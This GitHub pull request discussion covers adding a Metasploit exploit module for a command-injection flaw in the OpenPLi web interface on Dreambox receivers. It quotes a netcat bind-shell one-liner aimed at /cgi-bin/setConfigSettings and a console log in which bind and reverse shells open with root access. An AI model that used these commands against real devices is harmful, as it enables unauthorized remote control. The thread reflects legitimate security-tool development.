Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Openpli #1496

Merged
merged 1 commit into from Mar 14, 2013
Merged

Openpli #1496

merged 1 commit into from Mar 14, 2013

Conversation

m-1-k-3
Copy link
Contributor

@m-1-k-3 m-1-k-3 commented Feb 16, 2013

Hey guys,

attached you will find the module for the openpli web vulnerability.

http://www.s3cur1ty.de/m1adv2013-007

Looking forward to your feedback.

Best,
mIke

@jlee-r7
Copy link
Contributor

jlee-r7 commented Feb 20, 2013

Overriding the payload is not ok.

@m-1-k-3
Copy link
Contributor Author

m-1-k-3 commented Feb 20, 2013

could you explain it for me a bit more in detail?

Thanks

jlee-r7
jlee-r7 reviewed Feb 20, 2013
View reviewed changes
modules/exploits/linux/http/dreambox_openpli_shell.rb
uri = '/cgi-bin/setConfigSettings'

if payl =~ /bind/
cmd = Rex::Text.uri_encode("mknod /tmp/backpipe p; nc -l -p #{lport} 0</tmp/backpipe | /bin/sh 1>/tmp/backpipe")
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Don't do this. You're breaking handlers and bypassing encoders.

@m-1-k-3
Copy link
Contributor Author

m-1-k-3 commented Feb 24, 2013

The device has a netcat binary installed. This netcat binary does not understand the typical -e switch that is used by the metasploit payloads.

After discussing this issue with Juan offline it looks like the correct way is to generate a new cmd payload for this module. But for now it is just this one module that will use this payload. @jlee-r7 should we generate a new payload or is there any better way?

Best,
mIke

@jvazquez-r7 jvazquez-r7 mentioned this pull request Feb 28, 2013
Closed
@jvazquez-r7
Copy link
Contributor

After discussing the topic with @jlee-r7 #1532 tries to modify the cmd payloads to support netcat without -e option.

@m-1-k-3 do you mind to take a look and share opinion about #1532 ? Do you think the modified payloads would allow you to use them here?

Regards,

juan

This was referenced Mar 5, 2013
Closed
Closed
@jvazquez-r7
Copy link
Contributor

Hi m-1-k-3 we just merged #1576 . Hopefully the new netcat payloads can be used from the Openpli module and we can close it soon!

jvazquez-r7
jvazquez-r7 reviewed Mar 11, 2013
View reviewed changes
modules/exploits/linux/http/dreambox_openpli_shell.rb
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'netcat-e generic'
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Hopefully

'RequiredCmd' => 'netcat'

can be used now, after #1576 , and the embedded payloads into the module code can be avoided.

Please feel free to update it and update us with anything!

@m-1-k-3
Copy link
Contributor Author

m-1-k-3 commented Mar 14, 2013

Exploiting Demo - 192.168.178.105 / 0 exploit(dreambox_openpli_shell) > set PAYLOAD cmd/unix/bind_netcat_openbsd
PAYLOAD => cmd/unix/bind_netcat_openbsd
Exploiting Demo - 192.168.178.105 / 0 exploit(dreambox_openpli_shell) > set RHOST 192.168.178.102
RHOST => 192.168.178.102
Exploiting Demo - 192.168.178.105 / 0 exploit(dreambox_openpli_shell) > exploit

[] Started bind handler
[] Command shell session 1 opened (192.168.178.105:44177 -> 192.168.178.102:4444) at 2013-03-14 10:59:06 +0100
id

uid=0(root) gid=0(root)

Exploiting Demo - 192.168.178.105 / 0 exploit(dreambox_openpli_shell) > set PAYLOAD cmd/unix/reverse_netcat_openbsd
PAYLOAD => cmd/unix/reverse_netcat_openbsd
Exploiting Demo - 192.168.178.105 / 0 exploit(dreambox_openpli_shell) > set LHOST 192.168.178.105
LHOST => 192.168.178.105
Exploiting Demo - 192.168.178.105 / 0 exploit(dreambox_openpli_shell) > exploit

[] Started reverse handler on 192.168.178.105:4444
[] Command shell session 2 opened (192.168.178.105:4444 -> 192.168.178.102:1024) at 2013-03-14 10:59:52 +0100
id

uid=0(root) gid=0(root)

@jvazquez-r7 jvazquez-r7 mentioned this pull request Mar 14, 2013
Merged
@jvazquez-r7
Copy link
Contributor

Hi @m-1-k-3 ,

I've done a PR to your repo: m-1-k-3#3

I've done the final module cleanup for myself, please feel free to review changes, ask any doubt about my changes and once you can verify it's working it will be ready to merge. Just land the PR above on your repo and this one will be updated automatically.

I've verified the generated http request and it seems okay, but since I've not a real device to test, I'll need your help again!

@jvazquez-r7 jvazquez-r7 merged commit b4554d2 into rapid7:master Mar 14, 2013
@jvazquez-r7
Copy link
Contributor

Merged, thanks @m-1-k-3 !!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@m-1-k-3 @jlee-r7 @jvazquez-r7